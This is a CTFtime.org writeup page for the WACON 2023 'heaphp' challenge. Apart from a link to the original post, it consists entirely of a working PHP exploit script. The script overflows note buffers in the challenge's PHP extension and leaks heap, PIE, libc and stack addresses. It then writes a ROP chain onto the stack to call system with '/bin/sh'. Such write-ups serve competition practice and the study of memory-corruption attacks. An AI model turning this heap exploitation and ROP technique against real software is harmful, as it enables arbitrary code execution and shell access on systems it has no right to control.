CTFtime.org / WACON 2023 Prequal / heaphp / Writeup

https://uz56764.tistory.com/110
<?php
    echo "BREAKPOINT\n";
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaa");
    add_note("x2","bbbbbbbb");

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff");

    $buf = view_note(1);
    $lic = (ord($buf[8]))+(ord($buf[9])*256)+(ord($buf[10])*256*256)+(ord($buf[11])*256*256*256)+(ord($buf[12])*256*256*256*256)+(ord($buf[13])*256*256*256*256*256)+(ord($buf[14])*256*256*256*256*256*256) +0x8 - 0x1000;
    echo "lic : ";
    echo $lic;
    echo "
";

    $heap_to_base = $lic + 0x1fe0;
    echo "heap_to_base : ";
    echo $heap_to_base;
    echo "
";

    $addr1 = $heap_to_base & 0xffffffff;
    $addr2 = $heap_to_base >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);

    $buf = view_note(1);
    $lic = (ord($buf[0]))+(ord($buf[1])*256)+(ord($buf[2])*256*256)+(ord($buf[3])*256*256*256)+(ord($buf[4])*256*256*256*256)+(ord($buf[5])*256*256*256*256*256)+(ord($buf[6])*256*256*256*256*256*256);

    $pie_base = $lic - 0x16f200;
    echo "pie_base : ";
    echo $pie_base;
    echo "
";

    $base_to_libc = $pie_base + 0x544ff0;
    echo "base_to_libc : ";
    echo $base_to_libc;
    echo "
";

    $addr1 = $base_to_libc & 0xffffffff;
    $addr2 = $base_to_libc >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);

    $buf = view_note(1);
    $lic = (ord($buf[0]))+(ord($buf[1])*256)+(ord($buf[2])*256*256)+(ord($buf[3])*256*256*256)+(ord($buf[4])*256*256*256*256)+(ord($buf[5])*256*256*256*256*256)+(ord($buf[6])*256*256*256*256*256*256);

    $libc_base = $lic - 0x29dc0;
    echo "libc_base : ";
    echo $libc_base;
    echo "
";

    $environ = $libc_base + 0xb2f2d0 - 8192;
    echo "environ : ";
    echo $environ;
    echo "
";

    $addr1 = $environ & 0xffffffff;
    $addr2 = $environ >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);

    $buf = view_note(1);
    $lic = (ord($buf[0]))+(ord($buf[1])*256)+(ord($buf[2])*256*256)+(ord($buf[3])*256*256*256)+(ord($buf[4])*256*256*256*256)+(ord($buf[5])*256*256*256*256*256)+(ord($buf[6])*256*256*256*256*256*256);

    $stack = $lic;
    echo "stack : ";
    echo $stack;
    echo "
";

    $gadget = $libc_base + 0x000000000002a3e5;
    echo "gadget : ";
    echo $gadget;
    echo "
";

    $addr1 = $gadget & 0xffffffff;
    $addr2 = $gadget >> 32;
    $rop_1 = pack("V", $addr1).pack("V", $addr2);


    $binsh = $libc_base + 0x1d8698;
    echo "binsh : ";
    echo $binsh;
    echo "
";

    $addr1 = $binsh & 0xffffffff;
    $addr2 = $binsh >> 32;
    $rop_2 = pack("V", $addr1).pack("V", $addr2);


    $system = $libc_base + 0x50d60;
    echo "system : ";
    echo $system;
    echo "
";

    $addr1 = $system & 0xffffffff;
    $addr2 = $system >> 32;
    $rop_3 = pack("V", $addr1).pack("V", $addr2);

    $gadget2 = $libc_base + 0x000000000002a3e5 +1;
    echo "gadget2 : ";
    echo $gadget;
    echo "
";

    $addr1 = $gadget2 & 0xffffffff;
    $addr2 = $gadget2 >> 32;
    $rop_4 = pack("V", $addr1).pack("V", $addr2);

    $ret = $stack - 0x3a48 + 0x8 + 0x8 + 0x8;
    echo "ret : ";
    echo $ret;
    echo "
";

    $addr1 = $ret & 0xffffffff;
    $addr2 = $ret >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
    edit_note(1, $rop_3[0].$rop_3[1].$rop_3[2].$rop_3[3].$rop_3[4].$rop_3[5].$rop_3[6].$rop_3[7]);


    $ret = $stack - 0x3a48 + 0x8 + 0x8;
    echo "ret : ";
    echo $ret;
    echo "
";

    $addr1 = $ret & 0xffffffff;
    $addr2 = $ret >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
    edit_note(1, $rop_4[0].$rop_4[1].$rop_4[2].$rop_4[3].$rop_4[4].$rop_4[5].$rop_4[6].$rop_4[7]);


    $ret = $stack - 0x3a48 + 0x8;
    echo "ret : ";
    echo $ret;
    echo "
";

    $addr1 = $ret & 0xffffffff;
    $addr2 = $ret >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
    edit_note(1, $rop_2[0].$rop_2[1].$rop_2[2].$rop_2[3].$rop_2[4].$rop_2[5].$rop_2[6].$rop_2[7]);


    $ret = $stack - 0x3a48;
    echo "ret : ";
    echo $ret;
    echo "
";

    $addr1 = $ret & 0xffffffff;
    $addr2 = $ret >> 32;
    $addr = pack("V", $addr1).pack("V", $addr2);

    delete_note(0);
    add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
    edit_note(1, $rop_1[0].$rop_1[1].$rop_1[2].$rop_1[3].$rop_1[4].$rop_1[5].$rop_1[6].$rop_1[7]);

    echo "END";



    ?>
        ```
Original writeup (https://uz56764.tistory.com/110).
heaphp

Comments

Sign in with
